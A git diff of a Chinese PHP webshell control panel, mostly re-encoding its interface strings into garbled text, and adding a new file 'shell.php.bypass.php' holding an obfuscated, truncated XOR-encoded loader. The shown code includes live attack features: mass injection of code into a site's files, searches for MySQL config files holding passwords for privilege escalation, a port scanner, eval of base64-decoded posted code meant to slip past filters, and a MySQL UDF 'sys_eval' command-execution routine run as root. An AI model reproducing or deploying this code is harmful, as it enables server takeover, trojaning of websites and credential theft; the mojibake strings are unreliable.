文件类型请用"|"隔开,也可以是指定文件名.
'); - html_input("text","path",$patht,"路径范围","45"); - html_input("checkbox","pass","","使用目录遍历","",true); - html_input("text","type",$typet,"

文件类型","60"); + html_n('
ļ"|",Ҳָļ.
'); + html_input("text","path",$patht,"·Χ","45"); + html_input("checkbox","pass","","ʹĿ¼","",true); + html_input("text","type",$typet,"

ļ","60"); html_text("code","67","5",$codet); html_n('

'); - html_radio("批量挂马","批量清马","guama","qingma"); - html_input("submit","passreturn","开始"); + html_radio("","","guama","qingma"); + html_input("submit","passreturn","ʼ"); html_n('
目标文件:

'); + html_n('
Ŀļ:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($patht,$codet,$_POST['return'],$bool,$typet); } break; case "tihuan": - html_n('
此功能可批量替换文件内容,请小心使用.

'); - html_input("text","path",root_dir,"路径范围","45"); - html_input("checkbox","pass","","使用目录遍历","",true); + html_n('
˹ܿ滻ļ,Сʹ.

'); + html_input("text","path",root_dir,"·Χ","45"); + html_input("checkbox","pass","","ʹĿ¼","",true); html_text("newcode","67","5",$_POST['newcode']); - html_n('

替换为'); + html_n('

滻Ϊ'); html_text("oldcode","67","5",$_POST['oldcode']); - html_input("submit","passreturn","替换","

"); + html_input("submit","passreturn","滻","

"); html_n('
目标文件:

'); + html_n('
Ŀļ:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']); } @@ -979,31 +979,31 @@ function delTank() { case "scanfile": css_js("4"); - html_n('
此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.
当服务器文件太多时,会影响执行速度,不建议使用目录遍历.

'); - html_input("text","path",root_dir,"路径名","45"); - html_input("checkbox","pass","","使用目录遍历","",true); - html_input("text","code",$_POST['code'],"

关键字","40"); - html_select(array("--MYSQL配置文件--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'"); + html_n('
˹ܿɺܷMYSQLûļ,Ȩ.
ļ̫ʱ,Ӱִٶ,ʹĿ¼.
'); + html_input("text","path",root_dir,"·","45"); + html_input("checkbox","pass","","ʹĿ¼","",true); + html_input("text","code",$_POST['code'],"

ؼ","40"); + html_select(array("--MYSQLļ--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'"); html_n('

'); - html_radio("搜索文件名","搜索包含文字","scanfile","scancode"); - html_input("submit","passreturn","搜索"); + html_radio("ļ","","scanfile","scancode"); + html_input("submit","passreturn",""); html_n('
找到文件:

'); + html_n('
ҵļ:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool); } break; case "scanphp": - html_n('
原理是根据特征码定义的,请查看代码判断后再进行删除.

'); - html_input("text","path",root_dir,"查找范围","40"); - html_input("checkbox","pass","","使用目录遍历

脚本类型","",true); + html_n('
ԭǸ붨,鿴жϺٽɾ.
'); + html_input("text","path",root_dir,"ҷΧ","40"); + html_input("checkbox","pass","","ʹĿ¼

ű","",true); html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP")); - html_input("submit","passreturn","查找","

"); + html_input("submit","passreturn","","

"); html_n('
找到文件:

'); + html_n('
ҵļ:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool); } @@ -1014,9 +1014,9 @@ function delTank() { $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|8080|43958|5631|2049|873|999'; print<< -
扫描IP
-
端口号
-
+
ɨIP
+
˿ں
+
END; if((!empty($_POST['ip'])) && (!empty($_POST['port']))) @@ -1026,7 +1026,7 @@ function delTank() { for($i = 0;$i < count($ports);$i++) { $fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2); - echo $fp ? '开放端口 ---> '.$ports[$i].'
' : '关闭端口 ---> '.$ports[$i].'
'; + echo $fp ? 'Ŷ˿ ---> '.$ports[$i].'
' : 'رն˿ ---> '.$ports[$i].'
'; ob_flush(); flush(); } @@ -1036,19 +1036,19 @@ function delTank() { case "getcode": -if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "

获取 URL 内容失败

";exit;} +if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "

ȡ URL ʧ

";exit;} print<<
在线代理ߴ

  • 用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.
  • 用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.
  • 用本功能浏览的 URL,在目标主机上留下的IP记录是 : {$_SERVER['SERVER_NAME']}

  • ñܽʵּ򵥵 HTTP ,ʾʹ·ͼƬӼCSSʽ.
  • ñܿͨĿURL,֧ SQL Injection ̽ԼijЩַ.
  • ñ URL,ĿµIP¼ : {$_SERVER['SERVER_NAME']}
URL: - +
不用写<? ?>标签,此功能优化使用BASE64加密传送,防止恶意代码被拦,用了就知道(小小细节,注定成就)



'; + }
д<? ?>ǩ,˹ŻʹBASE64ֹܴͣ뱻˾֪ССϸڣעɾͣ



'; if(!empty($_POST['phpcode'])){ echo "

"; eval(stripslashes(base64_decode($_POST['phpcode']))); @@ -1172,8 +1172,8 @@ function delTank() { break; case "myexp": - $MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.'; - $info = '命令回显'; + $MSG_BOX = 'ȵDLL,ִ.MYSQLûΪrootȨ,·ܼDLLļ.'; + $info = ''; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { @@ -1184,7 +1184,7 @@ function delTank() { @mysql_select_db($mdata); /*************************************/ $str=mysql_get_server_info(); - //echo 'MYSQL版本:'.$str." "; + //echo 'MYSQL汾:'.$str." "; if($str[2]>=1){ $sql="SHOW VARIABLES LIKE '%plugin_dir%'"; @@ -1218,14 +1218,14 @@ function delTank() { { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function sys_eval returns string soname \''.$inpath.'\';'; - $MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败'.mysql_error(); + $MSG_BOX = @mysql_query($query,$conn) ? 'װDLLɹ' : 'װDLLʧ'.mysql_error(); } - else $MSG_BOX = '导出DLL文件失败'.mysql_error(); + else $MSG_BOX = 'DLLļʧ'.mysql_error(); } - else $MSG_BOX = '写入临时表失败'; + else $MSG_BOX = 'дʱʧ'; @mysql_query('DROP TABLE Envl_Temp_Tab;',$conn); } - else $MSG_BOX = '创建临时表失败'; + else $MSG_BOX = 'ʱʧ'; } if(!empty($_POST['runcmd'])) { @@ -1236,28 +1236,28 @@ function delTank() { $k = 0; $info = NULL; while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;} $info = $infotmp; - $MSG_BOX = '执行成功'; + $MSG_BOX = 'ִгɹ'; } - else $MSG_BOX = '执行失败'; + else $MSG_BOX = 'ִʧ'; } } - else $MSG_BOX = '连接MYSQL失败'; + else $MSG_BOX = 'MYSQLʧ'; } print<<
{$MSG_BOX}
-地址 -端口 -用户 -密码 -库名 +˿ + +
-加载路径(自动获取) -64位MYSQL -
-
支持高版本MYSQL
- +·(Զȡ) +64λMYSQL +
+
ָ֧߰汾MYSQL
+ 
 
@@ -1278,16 +1278,16 @@ function delTank() {
 	  	setcookie('m_eanverport',$_POST['mport'],$cookietime);
 	  	setcookie('m_eanveruser',$_POST['muser'],$cookietime);
 	  	setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
-	  	die('正在登录,请稍候...');
+	  	die('ڵ¼,Ժ...');
 	  }
   }
 print<<
-
地址 

-
端口 

-
用户 

-
密码 

-
 

+
ַ 

+
˿ 

+
û 

+
 

+
 

 
 END;
 break;
@@ -1300,7 +1300,7 @@ function delTank() {
 
 END;
 		$BOOL = false;
-		$MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].'      地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].'      版本:';
+		$MSG_BOX = 'û:'.$_COOKIE['m_eanveruser'].'      ַ:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].'      汾:';
 		$k = 0;
 		$result = @mysql_query('select version();',$conn);
 		while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
-		echo '
 数据库:';
+		echo '
 ݿ:';
 		$result = mysql_query("SHOW DATABASES",$conn);
 		while($db = mysql_fetch_array($result)){echo '  ['.$db['Database'].']';}
 		echo '
';
@@ -1333,7 +1333,7 @@ function SubmitUrl(){
 		{
 			mysql_select_db($_GET['db'],$conn);
             $_POST['nsql']=base64_decode($_POST['nsql']);
-			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '执行成功' : '执行失败 '.mysql_error();}
+			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? 'ִгɹ' : 'ִʧ '.mysql_error();}
 			if(is_array($_POST['insql']))
 			{
 				$query = 'INSERT INTO '.$_GET['table'].' (';
@@ -1343,7 +1343,7 @@ function SubmitUrl(){
 					$queryb .= '\''.addslashes($key).'\',';
 				}
 				$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
-				$MSG_BOX = mysql_query($query,$conn) ? '添加成功' : '添加失败 '.mysql_error();
+				$MSG_BOX = mysql_query($query,$conn) ? 'ӳɹ' : 'ʧ '.mysql_error();
 			}
 			if(is_array($_POST['upsql']))
 			{
@@ -1353,7 +1353,7 @@ function SubmitUrl(){
 					$queryb .= $var.'=\''.addslashes($key).'\',';
 				}
 				$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
-				$MSG_BOX = mysql_query($query,$conn) ? '修改成功' : '修改失败 '.mysql_error();
+				$MSG_BOX = mysql_query($query,$conn) ? '޸ijɹ' : '޸ʧ '.mysql_error();
 			}
 			if(isset($_GET['del']))
 			{
@@ -1362,23 +1362,23 @@ function SubmitUrl(){
 				$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
 				foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
 				$where = $query.substr($queryc, 0, -4).';';
-				$MSG_BOX = mysql_query($where,$conn) ? '删除成功' : '删除失败 '.mysql_error();
+				$MSG_BOX = mysql_query($where,$conn) ? 'ɾɹ' : 'ɾʧ '.mysql_error();
 			}
 			$action = '?eanver=mysql_msg&db='.$_GET['db'];
-			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '删除成功' : '删除失败 '.mysql_error();}
+			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? 'ɾɹ' : 'ɾʧ '.mysql_error();}
 			if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
 			if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
 			echo '
';
 			echo ' ';
-			echo '';
-			echo ' ';
-			echo ' ';
-			echo '
';
+			echo '';
+			echo ' ';
+			echo ' ';
+			echo '
';
 			echo '
'.$MSG_BOX.'
'.$_GET['db'].' ---> ';
 			if(isset($_GET['table']))
 			{
 				echo ''.$_GET['table'].' ';
-				echo '[插入]
';
+				echo '[]
'; if(isset($_GET['edit'])) { if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table']; @@ -1414,7 +1414,7 @@ function SubmitUrl(){ if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20; echo ''; - echo ''; + echo ''; while($row = @mysql_fetch_assoc($result)) { array_push($fields,$row['Field']); @@ -1426,18 +1426,18 @@ function SubmitUrl(){ $v = $p; while($text = @mysql_fetch_assoc($result)) { - echo ''; + echo ''; foreach($fields as $row){echo '';} echo ''."\r\n";$v++; } echo '
操作
修改 '; - echo ' 删除
޸ '; + echo ' ɾ '.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'
'; $pagep=$page-1; $pagen=$page+1; - echo "共有 ".$row_num." 条记录 "; - if($pagep>0) $pagenav.=" 首页 上一页 "; else $pagenav.=" 上一页 "; - if($pagen<=$pages) $pagenav.=" 下一页 尾页"; else $pagenav.=" 下一页 "; - $pagenav.=" 第 [".$page."/".$pages."] 页 跳到页"; + echo " ".$row_num." ¼ "; + if($pagep>0) $pagenav.=" ҳ һҳ "; else $pagenav.=" һҳ "; + if($pagen<=$pages) $pagenav.=" һҳ βҳ"; else $pagenav.=" һҳ "; + $pagenav.=" [".$page."/".$pages."] ҳ ҳ"; echo $pagenav; echo '
'; } @@ -1468,17 +1468,17 @@ function SubmitUrl(){ } $query = 'SHOW TABLES FROM '.$_GET['db'].';'; echo ''; - echo ''; - echo ''; - echo ''; - echo ''; + echo ''; + echo ''; + echo ''; + echo ''; $result = @mysql_query($query,$conn); $k = 0; while($table = mysql_fetch_row($result)) { $charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_')); echo ''; - echo ''; + echo ''; echo ''."\r\n"; $k++; } @@ -1486,7 +1486,7 @@ function SubmitUrl(){ } } } - else die('连接MYSQL失败,请重新登录.'); + else die('MYSQLʧ,µ¼.'); if(!$BOOL and addslashes($query)!='') echo ''; break; @@ -1555,7 +1555,7 @@ function hmlogin($xiao=1){ } function do_down($fd){ - if(!@file_exists($fd)) msg('下载文件不存在'); + if(!@file_exists($fd)) msg('ļ'); $fileinfo = pathinfo($fd); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); @@ -1750,21 +1750,21 @@ function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){ switch($type){ case "guama": if(debug($files,$filetype)){ - do_write($files,"ab","\n".$code) ? html_n("成功--> $files
") : html_n("失败--> $files
"); + do_write($files,"ab","\n".$code) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
"); } break; case "qingma": $filecode = @file_get_contents($files); if(stristr($filecode,$code)){ $newcode = str_replace($code,'',$filecode); - do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
"); + do_write($files,"wb",$newcode) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
"); } break; case "tihuan": $filecode = @file_get_contents($files); if(stristr($filecode,$code)){ $newcode = str_replace($code,$filetype,$filecode); - do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
"); + do_write($files,"wb",$newcode) ? html_n("ɹ--> $files
") : html_n("ʧ--> $files
"); } break; case "scanfile": @@ -1786,8 +1786,8 @@ function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){ if($fileinfo['extension'] == $code){ $filecode = @file_get_contents($files); if(muma($filecode,$code)){ - html_a("?eanver=editr&p=".urlencode($files),"编辑"); - html_a("?eanver=del&p=".urlencode($files),"删除"); + html_a("?eanver=editr&p=".urlencode($files),"༭"); + html_a("?eanver=del&p=".urlencode($files),"ɾ"); echo $files.'
'; } } @@ -1945,7 +1945,7 @@ function createfile(){ function File_Act($array,$actall,$inver,$REAL_DIR) { - if(($count = count($array)) == 0) return '请选择文件'; + if(($count = count($array)) == 0) return 'ѡļ'; if($actall == 'e') { function listfiles($dir=".",$faisunZIP,$mydir){ @@ -1979,7 +1979,7 @@ function listfiles($dir=".",$faisunZIP,$mydir){ function num_bitunit($num){ $bitunit=array(' B',' KB',' MB',' GB'); for($key=0;$key=pow(2,10*$key)-1){ //1023B 会显示为 1KB + if($num>=pow(2,10*$key)-1){ //1023B ʾΪ 1KB $num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]"; } } @@ -1995,12 +1995,12 @@ function num_bitunit($num){ $filenum += listfiles($file,$faisunZIP,$mydir); } $faisunZIP -> createfile(); - return "压缩完成,共添加 $filenum 个文件.
点击下载 $inver (".num_bitunit(filesize("$inver")).")"; + return "ѹ, $filenum ļ.
$inver (".num_bitunit(filesize("$inver")).")"; }else{ - return "$inver 不能写入,请检查路径或权限是否正确.
"; + return "$inver д,·ȨǷȷ.
"; } }else{ - return "没有选择的文件或目录.
"; + return "ûѡļĿ¼.
"; } @@ -2011,24 +2011,24 @@ function num_bitunit($num){ $array[$i] = urldecode($array[$i]); switch($actall) { - case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break; - case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break; - case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break; - case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break; + case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '·'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = 'Ƶ'.$inver.'Ŀ¼'; break; + case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'ɾ'; break; + case "c" : if(!eregi("^[0-7]{4}$",$inver)) return 'ֵ'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '޸Ϊ'.$inver; break; + case "d" : @touch($array[$i],strtotime($inver)); $msg = '޸ʱΪ'.$inver; break; } $i++; } - return '所选文件'.$msg.'完毕'; + return 'ѡļ'.$msg.''; } function start_unzip($tmp_name,$new_name,$todir='zipfile'){ $zip = new ZipArchive() ; if ($zip->open($tmp_name) !== TRUE) { -echo '抱歉!压缩包无法打开或损坏'; +echo 'Ǹѹ޷򿪻'; } $zip->extractTo($todir); $zip->close(); -echo '解压完毕!   进入解压目录   返回'; +echo 'ѹϣ   ѹĿ¼   '; } function muma($filecode,$filetype){ @@ -2086,7 +2086,7 @@ function html_img($url){ } function back(){ - html_n(""); + html_n(""); } function html_radio($namei,$namet,$v1,$v2){ @@ -2256,33 +2256,33 @@ function html_main() { if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { - $hsafemode = "ON (开启)"; + $hsafemode = "ON ()"; } else { - $hsafemode = "OFF (关闭)"; + $hsafemode = "OFF (ر)"; } $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]); $Server_OS = PHP_OS; $Server_Soft = $_SERVER["SERVER_SOFTWARE"]; $web_server = php_uname(); $title = $_SERVER["HTTP_HOST"] . "/Manager"; - html_n("" . $title . "
表名 操作 字符集 大小
ַ С
'.$table[0].' 插入 删除 ɾ '.$statucoll[$k].''.File_Size($statusize[$k]).'
安全模式:{$hsafemode}-----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}
"); + html_n("" . $title . "
ȫģʽ:{$hsafemode}-----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}
"); html_n("
"); } function islogin($shellname,$myurl){ print<<body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;} -

{$shellname}

输入密码:


请勿用于非法用途,后果作者概不负责!
+

{$shellname}




ڷǷ;߸Ų
END; } function html_sql(){ - html_input("text","sqlhost","localhost","
MYSQL地址","30"); - html_input("text","sqlport","3306","
MYSQL端口","30"); - html_input("text","sqluser","root","
MYSQL用户","30"); - html_input("password","sqlpass","","
MYSQL密码","30"); - html_input("text","sqldb","dbname","
MYSQL库名","30"); - html_input("submit","sqllogin","登录","
"); + html_input("text","sqlhost","localhost","
MYSQLַ","30"); + html_input("text","sqlport","3306","
MYSQL˿","30"); + html_input("text","sqluser","root","
MYSQLû","30"); + html_input("password","sqlpass","","
MYSQL","30"); + html_input("text","sqldb","dbname","
MYSQL","30"); + html_input("submit","sqllogin","¼","
"); html_n(''); } @@ -2418,7 +2418,7 @@ function rusuredel(msg,url){ } function Delok(msg,gourl) { - smsg = "确定要删除[" + unescape(msg) + "]吗?"; + smsg = "ȷҪɾ[" + unescape(msg) + "]?"; if(confirm(smsg)) { if(gourl == \'b\') @@ -2440,14 +2440,14 @@ function CheckAll(form) } function CheckDate(msg,gourl) { - smsg = "当前文件时间:[" + msg + "]"; + smsg = "ǰļʱ:[" + msg + "]"; re = prompt(smsg,msg); if(re) { var url = gourl + re; var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; var r = re.match(reg); - if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;} + if(r==null){alert(\'ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss\');return false;} else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();} } } @@ -2490,7 +2490,7 @@ function CheckDate(){ var r = re.match(reg); var t = document.getElementById(\'charset\').value; t = t.toLowerCase(); - if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;} + if(r==null){alert(\'ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss\');return false;} else{document.getElementById(\'newfile\').value = base64encode(document.getElementById(\'newfile\').value); if(t=="utf-8"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));} '); @@ -2507,7 +2507,7 @@ function CheckDate(){ Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb"; Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****"; Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****"; - Str[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;"; + Str[4] = "Provider=MSDAORA.1;Password=;User ID=ʺ;Data Source=;Persist Security Info=True;"; Str[6] = "SELECT * FROM [TableName] WHERE ID<100"; Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')"; Str[8] = "DELETE FROM [TableName] WHERE ID=100"; @@ -2835,7 +2835,7 @@ function ExtractFile($header,$to,$zip){ if((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header['filename'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){ @chmod($mydir,0777); $this->total_folders ++; - echo "目录: $mydir
"; + echo "Ŀ¼: $mydir
"; } } @@ -2898,7 +2898,7 @@ function ExtractFile($header,$to,$zip){ } $this->total_files ++; - echo "文件: $to$header[filename]
"; + echo "ļ: $to$header[filename]
"; return true; } } diff --git a/shell.php.bypass.php b/shell.php.bypass.php new file mode 100644 index 0000000..de9750b --- /dev/null +++ b/shell.php.bypass.php @@ -0,0 +1,10 @@ +PTHD('Jnt-}+'^"\x2b\x1d\x7\x48\xf\x5f",array(('a \ No newline at end of file